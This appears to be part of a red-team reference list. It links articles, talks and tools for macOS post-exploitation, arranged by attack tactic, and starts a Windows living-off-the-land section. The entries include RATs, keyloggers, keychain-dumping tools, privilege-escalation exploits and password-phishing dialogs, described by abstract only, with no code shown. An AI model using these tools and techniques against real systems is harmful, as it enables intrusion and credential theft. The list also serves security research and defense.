- Abusing MacOS Entitlements for code execution - impost0r(2020)
- Lazarus Group Goes 'Fileless' an implant w/ remote download & in-memory execution - Patrick Wardle(2019)
-
Weaponizing a Lazarus Group Implant - Patrick Wardle(2020)
- repurposing a 1st-stage loader, to execute custom 'fileless' payloads
- Using macOS Internals for Post Exploitation - Cedric Owens(2019)
-
Command and Scripting Interpreter
-
AppleScript
-
101
- AppleScript Language Guide - developer.apple
-
AppleScript Fundamentals - developer.apple
- Section from the Language Guide
- AppleScript - William R. Cook(2006)
-
Scripting with AppleScript - developer.apple
- The following is a brief introduction to AppleScript scripts, tools for working with them, and information on using AppleScript scripts together with other scripting systems. For related documents, see the learning paths in Getting Started with AppleScript.
- AppleScript: The Definitive Guide, 2nd Edition - Matt Neuburg
- AppleScript Reference Library
- AppleScriptLanguageGuide - Apple
- Open Scripting Architecture - developer.apple.com
-
Articles/Blogposts/Writeups
- How Offensive Actors Use AppleScript for Attackign macOS - Phil Stokes(2020)
- macOS Red Team: Spoofing Privileged Helpers (and Others) to Gain Root - Phil Stokes
- macOS Red Team: Calling Apple APIs Without Building Binaries - Phil Stokes
- Launch Scripts from Webpage Links - macosxautomation.com
- Using NSAppleScript - appscript.sourceforge
- hello, applescript 2: user in, user out - philastokes(applehelpwriter.com 2018)
- hello, applescript 3: (don’t?) tell me to run - philastokes(appplehelpwriter 2018)
-
Tools
-
Orchard
- Live off the land for macOS. This program allows users to do Active Directory enumeration via macOS JXA (JavaScript for Automation) code. This is the newest version of AppleScript, and thus has very poor documentation on the web.
-
Orchard
-
101
-
Javascript for Automation(JXA)
-
Talks/Presentations/Videos
-
Bash-ing Brittle Indicators: Red Teaming macOS without Bash or Python - Cody Thomas(Objective by the Sea v2.0)
- Slides
- In this talk, I'll go into the research, development, and usage of a new kind of agent based on JavaScript for Automation (JXA) and how it can be used in modern red teaming operations. This agent is incorporated into a broader open source project designed for collaborative red teaming I created called Apfell. I will discuss TTPs for doing reconnaissance, persistence, injection, and some keylogging all without using a shell command or spawning another scripting language. I will go into details of how JXA can be used to create an agent complete with encrypted key exchange for secure communications, domain fronting C2, and modular design to load or change key functionality on the fly. I will also cover the defensive considerations of these TTPs and how Apple is starting to secure these capabilities going forward.
-
Bash-ing Brittle Indicators: Red Teaming macOS without Bash or Python - Cody Thomas(Objective by the Sea v2.0)
-
Talks/Presentations/Videos
-
Objective-C
- Articles/Blogposts/Writeups
-
Swift
- Articles/Blogposts/Writeups
-
Tools
-
ShellOut
- Easily run shell commands from a Swift script or command line tool
-
ShellOut
-
AppleScript
-
In-Memory Execution
- Articles/Blogposts/Writeups
-
Tools
-
macos_execute_from_memory
- PoC of macho loading from memory
-
macos_execute_from_memory
-
Office Macros
- Articles/Blogposts/Writeups * Running JXA Payloads from macOS Office Macros - Cedric Owens(2020)
-
Talks/Presentations/Videos
-
Office Drama on macOS - Patrick Wardle(DefconSafemode2020)
- On the Windows platform, macro-based Office attacks are well understood (and frankly are rather old news). However on macOS, though such attacks are growing in popularity and are quite en vogue, they have received far less attention from the research and security community. In this talk, we will begin by analyzing recent documents that contain macro-based attacks targeting Apple's desktop OS, highlighting the macOS-specific exploit code and payloads. Though sophisticated APT groups are behind several of these attacks, (luckily) these malicious documents and their payloads are constrained by recent application and OS-level security mechanisms. However, things could be far worse! To illustrate this claim, we'll detail the creation of a powerful exploit chain, that begins with CVE-2019-1457, leveraged a new sandbox escape and ended with a full bypass of Apple's stringent notarization requirements. Triggered by simply opening a malicious (macro-laced) Office document, no other user interaction was required in order to persistently infect even a fully-patched macOS Catalina system! To end the talk, we'll discuss various prevention and detection mechanisms that could thwart each stage of the exploit chain, as well as that aim to generically provide protection against future attacks!
-
Office Drama on macOS - Patrick Wardle(DefconSafemode2020)
-
URL Handlers
- Articles/Blogposts/Writeups
-
User Execution
-
Malicious Link
- Articles/Blogposts/Writeups
-
Malicious File
- Articles/Blogposts/Writeups
-
Tools
-
HappyMac
- A Python Mac app to suspend background processes
-
Platypus
- Platypus is a developer tool that creates native Mac applications from command line scripts such as shell scripts or Python, Perl, Ruby, Tcl, JavaScript and PHP programs. This is done by wrapping the script in an application bundle along with a slim app binary that runs the script.
-
HappyMac
-
Malicious Link
-
Tools
-
Mouse
- Mouse Framework is an iOS and macOS post-exploitation framework that gives you a command line session with extra functionality between you and a target machine using only a simple Mouse Payload. Mouse gives you the power and convenience of uploading and downloading files, tab completion, taking pictures, location tracking, shell command execution, escalating privileges, password retrieval, and much more.
-
Appfell
- A collaborative, multi-platform, red teaming framework
- MacShell Post Exploitation Tool - Cedric Owens
-
MacShell
- MacShell is a macOS post exploitation tool written in python using encrypted sockets. I wrote this tool as a way for defenders and offensive security researchers to more easily understand the inner workings of python-based post exploitation tools on macOS.
-
MacShellSwift
- MacShellSwift is a proof of concept MacOS post exploitation tool written in Swift using encrypted sockets. I rewrote a prior tool of mine MacShell (one of my repos) and changed the client to Swift intstead of python. This tool consists of two parts: a server script and a client binary. I wrote this tool to help blue teamers proactively guage detections against macOS post exploitation methods that use macOS internal calls. Red teams can also find this of use for getting ideas around using Swift for macOS post exploitation.
-
Parasite
- Parasite is a powerful code insertion platform for OS X. It enables developers to easily create extensions which change the original behavior of functions. For users Parasite provides an easy way to install these extensions and tweak their OS.
-
EvilOSX
- A pure python, post-exploitation, RAT (Remote Administration Tool) for macOS / OSX.
-
Mouse
-
General
-
Persistence
- General
-
Presentations/Talks/Videos
-
Userland Persistence On Mac Os X "It Just Works" - Shmoocon 2015
- Got root on OSX? Do you want to persist between reboots and have access whenever you need it? You do not need plists, new binaries, scripts, or other easily noticeable techniques. Kext programming and kernel patching can be troublesome! Leverage already running daemon processes to guarantee your access. As the presentation will show, if given userland administrative access (read: root), how easy it is to persist between reboots without plists, non-native binaries, scripting, and kexts or kernel patching using the Backdoor Factory.
-
Userland Persistence On Mac Os X "It Just Works" - Shmoocon 2015
- Boot or Logon Initialization Scripts
- Compromise Client Software Binary
- Folder Actions
- Xcode
-
Tools
-
p0st-ex
- Post-exploitation scripts for OosxpostS X persistence and privesc
-
iMessagesBackdoor
- A script to help set up an event handler in order to install a persistent backdoor that can be activated by sending a message.
-
p0st-ex
-
Privilege Escalation
-
General
-
Articles/Blogposts/Writeups
-
Hidden backdoor API to root privileges in Apple OS X
- The Admin framework in Apple OS X contains a hidden backdoor API to root privileges. It’s been there for several years (at least since 2011), I found it in October 2014 and it can be exploited to escalate privileges to root from any user account in the system. The intention was probably to serve the “System Preferences” app and systemsetup (command-line tool), but any user process can use the same functionality. Apple has now released OS X 10.10.3 where the issue is resolved. OS X 10.9.x and older remain vulnerable, since Apple decided not to patch these versions. We recommend that all users upgrade to 10.10.3.
- Works on 10.7 -> 10.10.2
-
Hidden backdoor API to root privileges in Apple OS X
-
Presentations/Talks/Videos
-
Hacking Exposed: Hacking Macs - RSA Keynote, George Kurtz and Dmitri Alperovitch, Part 1 "Delivery"(2019)
- CrowdStrike Co-founders, CEO George Kurtz and CTO Dmitri Alperovitch, and Falcon OverWatch Senior Engineer Jaron Bradley demonstrate a “Delivery” stage attack against a MacOS system. This demo is from their RSA 2019 keynote address titled, “Hacking Exposed: Hacking Macs.”
-
Hacking Macs from RSA- George Kurtz and Dmitri Alperovitch, Part 2 "Privilege Escalation"
- CrowdStrike Co-founders, CEO George Kurtz and CTO Dmitri Alperovitch, and Falcon OverWatch Senior Engineer Jaron Bradley demonstrate a “Privilege Escalation” stage attack against a MacOS system. This demo is from their RSA 2019 keynote address titled, “Hacking Exposed: Hacking Macs.”
-
OSX XPC Revisited - 3rd Party Application Flaws - Tyler Bohan(OffensiveCon2020)
- XPC or cross process communication is a way for OSX and iOS processes to communicate with one another and share information. One use for this is to elevate privileges using a daemon who listens as a XPC service. While Apple has released a coding guideline it is all to often ignored or incorrectly implemented in third-party applications. One striking example of this is the Privileged Helper Tool. In this talk I am going to dive into what a Privileged Helper Tool is and why you should care about it. I will show the viewers how to locate these on an OSX computer and walk through the reverse engineering steps needed to identify if the service is vulnerable. We will then set up communications via Objective-C to deliver a privilege escalation attack. I will be showcasing twenty plus vulnerabilities in at least five products. All tooling and code will be released with the talk!
-
Hacking Exposed: Hacking Macs - RSA Keynote, George Kurtz and Dmitri Alperovitch, Part 1 "Delivery"(2019)
-
Articles/Blogposts/Writeups
-
Dylib Hijacking
-
Articles/Blogposts/Writeups
-
DylibHijack
- python utilities related to dylib hijacking on OS X
-
DylibHijack
-
Talks/Presentations/Videos
-
Gaining Root with Harmless AppStore Apps - Csaba Fitzi
- Slides
- This talk is about my journey from trying to find dylib hijacking vulnerability in a particular application to finding a privilege escalation vulnerability in macOS. During the talk I will try to show the research process, how did I moved from one finding to the next and I will also show many of the failures / dead ends I had during the exploit development.First I will briefly cover what is a dylib hijacking, and what is the current state of various application regarding this type of vulnerability. We will see how hard is to exploit these in many cases due to the fact that root access is required. Second I will cover two seemingly harmless bugs affecting the installation process of AppStore apps, and we will see how can we chain these together in order to gain root privileges - for this we will utilise a completely benign app from the macOS App Store. Part of this I will cover how can we submit apps to the store, and what are the difficulties with that process.In the last part I will cover how we can infect and include our malicious file in an App installer without breaking the App’s signature.
-
Automated Dylib Hijacking - Jimi Sebree(Derbycon2019)
- Applications on macOS use a common and flawed method of loading dynamic libraries (dylib), which leaves them vulnerable to a post-exploitation technique known as dylib hijacking. Dylib hijacking is a technique used to exploit this flawed loading method in order to achieve privilege escalation, persistence, or the ability to run arbitrary code. This talk provides an overview of the attack vector and the process involved in exploiting vulnerable applications. Additionally, the process of automating the exploitation of vulnerable applications will be demonstrated and discussed in depth. The tools developed and used for this demonstration will be made publicly available.
-
Gaining Root with Harmless AppStore Apps - Csaba Fitzi
-
Tools
-
boko
- boko.py is an application scanner for macOS that searches for and identifies potential dylib hijacking and weak dylib vulnerabilities for application executables, as well as scripts an application may use that have the potential to be backdoored. The tool also calls out interesting files and lists them instead of manually browsing the file system for analysis. With the active discovery function, there's no more guess work if an executable is vulnerable to dylib hijacking!
-
boko
-
Articles/Blogposts/Writeups
- Elevated Execution with Prompt
- Emond
-
Exploitation for Privilege Escalation
- CVE-2019-8805 - A macOS Catalina privilege escalation - Scott Knight
-
Sniffing Authentication References on macOS - Patrick Wardle(2018)
- details of a privilege-escalation vulnerability (CVE-2017-7170)
-
The Ugly: for last ~13 years (OSX 10.4+) anybody could locally sniff 'auth tokens' then replay to stealthy & reliably elevate to r00t 🍎🤒☠️ The Bad: reported to Apple -they silently patched it (10.13.1) 🤬 The Good: when confronted they finally assigned CVE + updated docs 😋 [pic.twitter.com/RlNBT1DBvK](pic.twitter.com/RlNBT1DBvK)
- Mac OS X local privilege escalation (IOBluetoothFamily)
- How to gain root with CVE-2018-4193 in < 10s - Eloi Benoist-Vanderbeken
-
CVE-2018-4193
- exploit for CVE-2018-4193
-
Rootpipe
-
Rootpipe Reborn (Part I) - codecolorist
- CVE-2019-8513 TimeMachine root command injection
-
Rootpipe Reborn (Part II) - codecolorist
- CVE-2019-8565 Feedback Assistant race condition leads to root LPE
- Stick That In Your (root)Pipe & Smoke It - Patrick Wardle(Defcon23)
-
Rootpipe Reborn (Part I) - codecolorist
- Launch Daemon
-
Permissions Misconfiguration
-
Articles/Blogposts/Writeups
-
Exploiting directory permissions on macOS - theevilbit
- In the following post I will first go over the permission model of the macOS filesystem, with focus on the POSIX part, discuss some of the non trivial cases it can produce, and also give a brief overview how it is extended. I won’t cover every single detail of the permission model, as it would be a topic in itself, but rather what I found interesting from the exploitation perspective. Then I will cover how to find these bugs, and finally I will go through in detail all of the bugs I found. Some of these are very interesting as we will see, as exploitation of them involves “writing” to files owned by root, while we are not root, which is not trivial, and can be very tricky.
-
Exploiting directory permissions on macOS - theevilbit
-
Talks/Presentations/Videos
-
Root Canal - Samuel Keeley(OBTSv2.0)
- Slides
- Apple released System Integrity Protection/rootless with OS X El Capitan almost four years ago.The root account is still there, and many common pieces of software open the Mac up to simple root escalations - including common macOS management tools. How can we detect these vulnerabilities across our Mac fleets? What can root still be abused for in 2019?
-
Root Canal - Samuel Keeley(OBTSv2.0)
-
Articles/Blogposts/Writeups
- Plist Modification
-
Privileged File Operations
- Articles/Blogposts/Writeups
- Talks/Presentations/Videos
-
Process Injection
-
Articles/Blogposts/Writeups
-
Privilege Escalation on OS X below 10.0
- CVE-2014-8835
-
Privilege Escalation on OS X below 10.0
-
Tools
-
osxinj
- Another dylib injector. Uses a bootstrapping module since mach_inject doesn't fully emulate library loading and crashes when loading complex modules.
-
osxinj
-
Articles/Blogposts/Writeups
- Setuid and Setgid
- Startup Items
- Sudo
- Sudo Caching
- Valid Accounts
- Web Shell
- SIP Bypass
-
Exploits
-
Why
<blank>
Gets You Root- Patrick Wardle(2017)- In case you haven't heard the news, there is a massive security flaw which affects the latest version of macOS (High Sierra). The bug allows anybody to log into the root account with a blank, or password of their choosing. Yikes!
-
macOS 10.13.x SIP bypass (kernel privilege escalation)
- "Works only on High Sierra, and requires root privilege. It can be chained with my previous local root exploits."
- Slides
-
IOHIDeous(2017)
- Code
- A macOS kernel exploit based on an IOHIDFamily 0day.
-
Issue 1102196: Security: Keystone for macOS should use auditToken to validate incoming XPC message - Project0
- PrivEsc through Chrome installer.
-
Why
-
Talks/Presentations/Videos
- Death By 1000 Installers on macOS and it's all broken! - Patrick Wardle(Defcon25)
-
Attacking OSX for fun and profit tool set limiations frustration and table flipping Dan Tentler - ShowMeCon
- 'I was approached by Fusion to be part of their 'Real Future' documentary - specifically, and I quote, to 'see how badly I could fuck his life up, while having control of his laptop'. They wanted me to approach this scenario from how a typical attacker wou'
-
Tools
-
BigPhish
- This issue has been resolved by Apple in MacOS Sierra by enabling tty_tickets by default. NOTE: All other MacOS operation system (El Capitan, Yosemite, Mavericks etc...) still remain vulnerable to this exploit.
-
BigPhish
-
General
-
Defense Evasion
- 101
- Articles/Blogposts/Writeups
-
Talks/Presentations/Videos
-
Bypassing MacOS Detections With Swift - Cedric Owens(Derbycon2019)
- This talk is centered around red teaming in MacOS environments. Traditionally, MacOS post exploitation has largely been done in python with a heavy reliance on command line utilities. However, as defender tradecraft continues to evolve with detecting suspicious python usage on MacOS, we (as red teamers) should consider migrating to different post exploitation methods. In this talk, I will share why the Swift language can be beneficial for red teaming macOS environments. I will also share some macOS post exploitation code I have written using the Swift programming language and contrast detection techniques between python and Swift based post exploitation.
-
Bypassing MacOS Detections With Swift - Cedric Owens(Derbycon2019)
-
Tools
-
appencryptor
- A command-line tool to apply or remove Apple Binary Protection from an application.
-
appencryptor
- Application Whitelisting
-
Endpoint Security
-
101
-
EndpointSecurity - developer.apple
- Endpoint Security is a C API for monitoring system events for potentially malicious activity. Your client, which you can write in any language supporting native calls, registers with Endpoint Security to authorize pending events, or receive notifications of events that have already occurred. These events include process executions, mounting file systems, forking processes, and raising signals. Develop your system extension with Endpoint Security and package it in an app that uses the SystemExtensions framework to install and upgrade the extension on the user’s Mac.
-
EndpointSecurity - developer.apple
- Articles/Blogposts/Writeups
-
101
-
Gatekeeper
-
101
- Gatekeeper - Wikipedia
- Gatekeeper Bypass - ATT&CK
-
Safely open apps on your Mac - support.apple
- 'macOS includes a technology called Gatekeeper, that's designed to ensure that only trusted software runs on your Mac.'
-
Launch Service Keys -
LSFileQuarantineEnabled
- macOS Code Signing In Depth - developer.apple
- Articles/Blogposts/Writeups
-
101
-
System Integrity Protection(SIP)
- 101
-
Articles/Blogposts/Writeups
-
Bypassing Apple's System Integrity Protection - Patrick Wardle
- abusing the local upgrade process to bypass SIP]
-
Bypassing Apple's System Integrity Protection - Patrick Wardle
-
Talks/Presentations/Videos
-
Bad Things in Small Packages - Jaron Bradley
- Slides
- This talk will primarily focus on the work that went into discovering CVE-2019-8561. The vulnerability exists within PackageKit that could lead to privilege escalation, signature bypassing, and ultimately the bypassing of Apple's System Integrity Protection (SIP). This vulnerability was patched in macOS 10.14.4, but the details behind this exploit have not been documented anywhere prior to this conference!
-
Bad Things in Small Packages - Jaron Bradley
-
XProtect
- 101
-
Articles/Blogposts/Writeups
- How To Bypass XProtect on Catalina - Phil Stokes
-
XProtect
- This repo contains historical releases of the XProtect configuration data.
-
Credential Access
-
Cracking Password Hashes
-
Articles/Blogposts/Writeups
- How to extract hashes and crack Mac OS X Passwords - onlinehashcrack.com
- How to Hack a Mac Password Without Changing It - Tokyoneon
- Mac OSX Password Cracking - mcontino(2017)
-
What type of hash are a Mac's password stored in? - AskDifferent
- Check the first answer
- Cracking Mac OS Lion Passwords - frameloss.org(2011)
-
Tools
-
DaveGrohl 3.01 alpha
- A Password Cracker for OS X
-
DaveGrohl 3.01 alpha
-
Articles/Blogposts/Writeups
-
Bash History
- Articles/Blogposts/Writeups
-
Brute Force
- Articles/Blogposts/Writeups
- Tools
-
Credential Dumping
-
Articles/Blogposts/Writeups
-
Getting What You’re Entitled To: A Journey Into MacOS Stored Credentials - MDSec(2020)
- In this blog post we will explore how an operator can gain access to credentials stored within MacOS third party apps by abusing surrogate applications for code injection, including a case study of Microsoft Remote Desktop and Google Drive.
- Bypassing MacOS Privacy Controls - Adam Chester(2020)
-
Getting What You’re Entitled To: A Journey Into MacOS Stored Credentials - MDSec(2020)
- Talks/Presentations/Videos
- Tools
-
Articles/Blogposts/Writeups
-
Credentials from Web Browsers
- Articles/Blogposts/Writeups
- Talks/Presentations/Videos
- Tools
-
Credentials in Files
- Articles/Blogposts/Writeups
- Talks/Presentations/Videos
- Tools
-
Exploitation for Credential Access
- Articles/Blogposts/Writeups
- Talks/Presentations/Videos
- Tools
-
Input Capture
- Articles/Blogposts/Writeups
- In this post, we’re going to take a quick look at Frida and use it to steal credentials from KeePass.
- Talks/Presentations/Videos
-
Tools
-
kcap
- This program simply uses screen captures and programmatically generated key and mouse events to locally and graphically man-in-the-middle an OS X password prompt to escalate privileges.
-
kcap
-
Input Prompt
- Articles/Blogposts/Writeups
- Talks/Presentations/Videos
-
Tools
- Empire propmt.py
-
FiveOnceinYourlife
- Local osx dialog box phishing using osascript. Easier than keylogging on osx. Simply ask for the passwords you want.
-
Keychain
-
Articles/Blogposts/Writeups
- Keychain Services - developer.apple.com
-
Security Flaw in OS X displays all keychain passwords in plain text - Brenton Henry(2016)
- There is a method in OS X that will allow any user to export your keychain, without sudo privileges or any system dialogs, to a text file, with the username and passwords displayed in plain text. As of this writing(2016), this method works in at least 10.10 and 10.11.5, and presumably at the least all iterations in between.
- Stealing macOS apps' Keychain entries - Wojciech Reguła(2020)
-
Talks/Presentations/Videos
-
OBTS v2.0 "KeySteal: A Vulnerability in Apple's Keychain" (Linus Henze)
- Slides
- What do your iCloud, Slack, MS Office, etc. credentials have in common? Correct, they're all stored inside your Mac's Keychain. While the Keychain is great because it prevents all those annoying password prompts from disturbing you, the ultimate question is: Is it really safe? Does it prevent malicious Apps from stealing all my passwords?In this talk I will try to answer those questions, showing you how the Keychain works and how it can be exploited by showing you the full details of my KeySteal exploit for the first time. The complete exploit code will be available online after the talk.
-
OBTS v2.0 "KeySteal: A Vulnerability in Apple's Keychain" (Linus Henze)
-
Tools
-
Mac OS X Keychain Forensic Tool
- The chainbreaker can extract user credential in a Keychain file with Master Key or user password in forensically sound manner. Master Key candidates can be extracted from volafox or volatility keychaindump module. Supports: Snow Leopard, Lion, Mountain Lion, Mavericks, Yosemite, El Capitan, (High) Sierra. This branch contains a quick patch for chainbreaker to dump non-exportable keys on High Sierra, see README-keydump.txt for more details.
-
KeySteal
- KeySteal is a macOS <= 10.14.3 Keychain exploit that allows you to access passwords inside the Keychain without a user prompt. The vulnerability has been assigned CVE-2019-8526 number.
-
OSX Key Chain Dumper
- 'Scripts to dump the values out of OSX Keychain. Tested on OS X El Capitan ver 10.11.6'
-
keychaindump(2015)
- Keychaindump is a proof-of-concept tool for reading OS X keychain passwords as root. It hunts for unlocked keychain master keys located in the memory space of the securityd process, and uses them to decrypt keychain files.
-
osx-hash-dumper
- Bash script to dump OSX user hashes in crackable format. Author: Cedric Owens
- retrieve-osxhash.py
- Chainbreaker2 - Luke Gaddie
-
Mac OS X Keychain Forensic Tool
-
Articles/Blogposts/Writeups
-
Network Sniffing
- Articles/Blogposts/Writeups
- Talks/Presentations/Videos
- Tools
-
Private Keys
- Articles/Blogposts/Writeups
-
Securityd Memory
- Articles/Blogposts/Writeups
- Tools
-
Steal Web Session Cookie
- Articles/Blogposts/Writeups
- Tools
-
Two-Factor Authentication Interception
- Articles/Blogposts/Writeups
- Tools
-
Cracking Password Hashes
-
Discovery
-
Mac Quarantine Event Database - menial.co.uk(2011)
- After all the fuss surrounding the iPhone location log, you may be interested to know that there is a file on Macs running Snow Leopard or higher that keeps a record of files you've downloaded. This record is not purged when you clear Safari downloads, caches or even reset Safari completely.
- General/Unsorted
-
Process Discovery
- Articles/Blogposts/Writeups
-
Tools
-
Kemon
- An Open-Source Pre and Post Callback-Based Framework for macOS Kernel Monitoring.
-
Sinter
- Sinter is a 100% user-mode endpoint security agent for macOS 10.15 and above, written in Swift. Sinter uses the user-mode EndpointSecurity API to subscribe to and receive authorization callbacks from the macOS kernel, for a set of security-relevant event types. The current version of Sinter supports allowing/denying process executions; in future versions we intend to support other types of events such as file, socket, and kernel events.
-
Kemon
-
Remote System Discovery
- Articles/Blogposts/Writeups
- Tools
-
Security Software Discovery
- Articles/Blogposts/Writeups
-
Tools
-
AV_Enum_JXA
- JXA code to enumerate security software on a macOS host
-
AV_Enum_JXA
-
Software Discovery
- Articles/Blogposts/Writeups
- Tools
-
System Information Discovery
- Articles/Blogposts/Writeups
-
Tools
-
SwiftBelt
- SwiftBelt is a macOS enumerator inspired by @harmjoy's Windows-based Seatbelt enumeration tool. SwiftBelt does not utilize any command line utilities and instead uses Swift code (leveraging the Cocoa Framework, Foundation libraries, OSAKit libraries, etc.) to perform system enumeration. This can be leveraged on the offensive side to perform enumeration once you gain access to a macOS host. I intentionally did not include any functions that cause pop-ups (ex: keychain enumeration).
-
HealthInspector
- JXA situational awareness helper by simply reading specific files on a filesystem
-
SwiftBelt
-
Tools
-
forgetmenot
- local looting script in python
-
APOLLO - Apple Pattern of Life Lazy Output'er
- APOLLO stands for Apple Pattern of Life Lazy Output’er. I wanted to create this tool to be able to easily correlate multiple databases with hundreds of thousands of records into a timeline that would make the analyst (me, mostly) be able to tell what has happened on the device. iOS (and MacOS) have these absolutely fantastic databases that I’ve been using for years with my own personal collection of SQL queries to do what I need to get done. This is also a way for me to share my own research and queries with the community. Many of these queries have taken hours, even days to research and compile into something useful. My goal with this script is to put the analysis function the SQL query itself. Each query will output a different part of the puzzle. The script itself just compiles the data into a CSV or SQLite database for viewing and filtering. While this database/spreadsheet can get very large, it is still more efficient that running queries on multiple databases and compiling the data into a timeline manually.
-
forgetmenot
-
Mac Quarantine Event Database - menial.co.uk(2011)
-
Lateral Movement
-
AppleScript
- Articles/Blogposts/Writeups
- Tools
-
Application Deployment Software
- Articles/Blogposts/Writeups
- Tools
-
Exploitation of Remote Services
- Articles/Blogposts/Writeups
- Tools
-
Internal Spearphishing
- Articles/Blogposts/Writeups
- Tools
-
Logon Scripts
- Articles/Blogposts/Writeups
- Tools
-
Remote File Copy
- Articles/Blogposts/Writeups
- Tools
-
Remote Services
- Articles/Blogposts/Writeups
- Tools
-
SSH Hijacking
- Articles/Blogposts/Writeups
- Tools
-
Third-party Software
- Articles/Blogposts/Writeups
- Tools
-
AppleScript
-
Collection
- 101
- Articles/Blogposts/Writeups
- Audio Capture
- Automated Collection
-
Browser-Data
- Articles/Blogposts/Writeups
-
Tools
-
Chlonium
- Chlonium is an application designed for cloning Chromium Cookies.
-
Chlonium
- Clipboard Data
- Data from Information Repositories
-
Data from Local System
- Articles/Blogposts/Writeups
-
Tools
-
PICT - Post-Infection Collection Toolkit
- This set of scripts is designed to collect a variety of data from an endpoint thought to be infected, to facilitate the incident response process. This data should not be considered to be a full forensic data collection, but does capture a lot of useful forensic information.
-
PICT-Swift (Post Infection Collection Toolkit)
- This is a Swift (and slightly modified) version of Thomas Reed's PICT (Post Infection Collection Toolkit: https://github.com/thomasareed/pict). Thomas Reed is the brains behind the awesome PICT concept. I just simply wrote a Swift version of it and added an additional collector.
-
macOS-browserhist-parser
- Swift code to parse the quarantine history database, Chrome history database, Safari history database, and Firefox history database on macOS.
-
PICT - Post-Infection Collection Toolkit
- Data from Network Shared Drive
- Data from Removable Media
- Data Staged
-
Input Capture
- Articles/Blogposts/Writeups
-
Tools
-
SwiftSpy
- macOS keylogger, clipboard monitor, and screenshotter written in Swift
-
Swift-Keylogger
- Keylogger for mac written in Swift using HID
-
SwiftSpy
-
Screen Capture
- Articles/Blogposts/Writeups
- Tools
- Video Capture
-
MacOS Red Teaming Blogpost Series by Action Dan(2019)
- MacOS Red Teaming 201: Introduction - Action Dan
- MacOS Red Teaming 202: Profiles - Action Dan
- MacOS Red Teaming 203: MDM (Mobile Device Managment - Action Dan)
- MacOS Red Teaming 204: Munki Business - Action Dan
- MacOS Red Teaming 205: TCC (Transparency, Consent, and Control - Action Dan)
- MacOS Red Teaming 206: ARD (Apple Remote Desktop Protocol - Action Dan)
- MacOS Red Teaming 207: Remote Apple Events (RAE) - Action Dan
- MacOS Red Teaming 208: macOS ATT&CK Techniques - Action Dan
- MacOS Red Teaming 209: macOS Frameworks for Command and Control - Action Dan
- MacOS Red Teaming 210: Abusing Pkgs for Privilege Escalation - Action Dan
- MacOS Red Teaming 211: Dylib Hijacking - Action Dan
macOS Technologies
- Code Signing
-
Endpoint Security Framework
-
EndpointSecurity - developer.apple
- Endpoint Security is a C API for monitoring system events for potentially malicious activity. Your client, which you can write in any language supporting native calls, registers with Endpoint Security to authorize pending events, or receive notifications of events that have already occurred. These events include process executions, mounting file systems, forking processes, and raising signals. Develop your system extension with Endpoint Security and package it in an app that uses the SystemExtensions framework to install and upgrade the extension on the user’s Mac.
-
EndpointSecurity - developer.apple
-
GateKeeper
- App security overview - support.apple
- Protecting against malware - support.apple
- Gatekeeper and runtime protection - support.apple
-
Gatekeeper - Wikipedia
- 'macOS includes a technology called Gatekeeper, that's designed to ensure that only trusted software runs on your Mac.'
- Safely open apps on your Mac - support.apple
-
Mach-O Binaries
- 101
- System Integrity Protection
- Transparency, Consent, and Control
- XProtect
Post-Exploitation Windows
- 101
- Unsorted
-
Living_off_The_Land
-
101
- Living Off The Land: A Minimalist's Guide To Windows Post Exploitation - Christopher Campbell, Matthew Graeber(Derbycon3)
-
LOLBins - Living Off The Land Binaries & Scripts & Libraries
- "Living off the land" was coined by Matt Graeber - @mattifestation <3"
- The term LOLBins came from a twitter discussion on what to call these binaries. It was first proposed by Philip Goh - @MathCasualty here: https://twitter.com/MathCasualty/status/969174982579273728
- The term LOLScripts came from Jimmy - @bohops: https://twitter.com/bohops/status/984828803120881665
- Installers – Interactive Lolbins - Hexacorn
- WinBinDex - The Windows Binaries Index
-
Articles/Blogposts/Writeups
- Installers – Interactive Lolbins, Part 2 - Hexacorn
- Bring your own lolbas? - Hexacorn
- Reusigned Binaries - Hexacorn
- Reusigned Binaries – Living off the signed land - Hexacorn
- Hack Microsoft Using Microsoft Signed Binaries - Pierre-Alexandre Braeken
- Microsoft Applications and Blocklist - FortyNorth Security
- Unsanitized file validation leads to Malicious payload download via Office binaries. - Reegun J
- Background Intelligent Transfer Protocol - TH Team
- Stay positive Lolbins… not! - Hexacorn
- Living Off the Land - liberty-shell
- Living Off Windows Land – A New Native File “downldr” - Gal Kristal(2020)
- Also Node.js has been used to perform a Living off the Land (LotL) attack - Andrea Fortuna(2019)
- Upload and download small files with CertReq.exe - DTM(2020)
- Staying Off the Land: A Threat Actor Methodology - Crowdstrike(2020)
- Load/Inject malicious DLL using Microsoft Tools - safe(2018)
-
Talks/Presentations/Videos
-
Living Off the Land: A Minimalist’s Guide to Windows Post-Exploitation - Christopher Campbell, Matthew Graeber(Derybcon2013)
- Two of the biggest challenges of long-term penetration tests are advanced security products and active administrators. Host intrusion prevention, application white-listing and antivirus software are all looking for your tools. Administrators and network defenders are doing everything they can to find you. Surprisingly, the easiest way to hide from them and homestead in a Windows enterprise is to live off the land. Microsoft provides you with all the tools you need to get into a network and live there forever. Tools such as Wmic, Netsh and PowerShell are well-known to administrators, but they also provide an attacker a whole range of virtually untapped features. By simply leveraging PowerSploit and a few tricks you can reliably bypass antivirus, get around whitelisting, escalate privileges, redirect network traffic, take full packet captures, log keystrokes, take screenshots, dump hashes, persist and pivot to other hosts all without introducing a single binary!
-
Code Execution with JDK Scripting Tools & Nashorn Javascript Engine - Brett Hawkins(Derbycon2018)
- There are several languages and methods used to execute code on a computer system, such as C#, Powershell, Python, VBA, and many more. The defense is getting better, which has caused the offense to adapt and look for innovative ways to “live off the land”. One area that has not been explored deeply is utilizing tools that the Java Development Kit (JDK) provides. According to a statement by Oracle, Java runs on 3 billion devices. Enterprises depend on Java running on their user endpoints and servers in order to keep their businesses running. This makes using tools installed with the JDK very enticing to attackers. This talk will explore using JDK command-line scripting tools and the Nashorn Javascript Engine to perform several actions, such as downloading files, executing scripts locally and remotely, and gaining a remote interactive shell to a computer system. Detective and preventive controls will also be discussed for the usage of these JDK scripting tools.
-
Living off the land: enterprise post-exploitation - Adam Reiser(Derbycon2018)
- You've compromised that initial server and gained a foothold in the target network: congratulations! But wait - the shadow file has no hashes but root, the ssh keys have strong passphrases, and all the interesting traffic is encrypted - there's nothing of value here! Or is there? In this talk, I will explore post-exploitation techniques for turning your compromised bastion hosts into active credential interceptors under a variety of blue team monitoring scenarios.
-
WEBCAST: Hacker Tools, Compliments of Microsoft - David Fletcher & Sally Vandeven(2018)
- Slides
- Join David “Fletch” and Sally as they explore the cornucopia of wonderful, free tools in the SysInternals Suite that conveniently are signed by Microsoft and that they use on a daily basis to hack their customers.
-
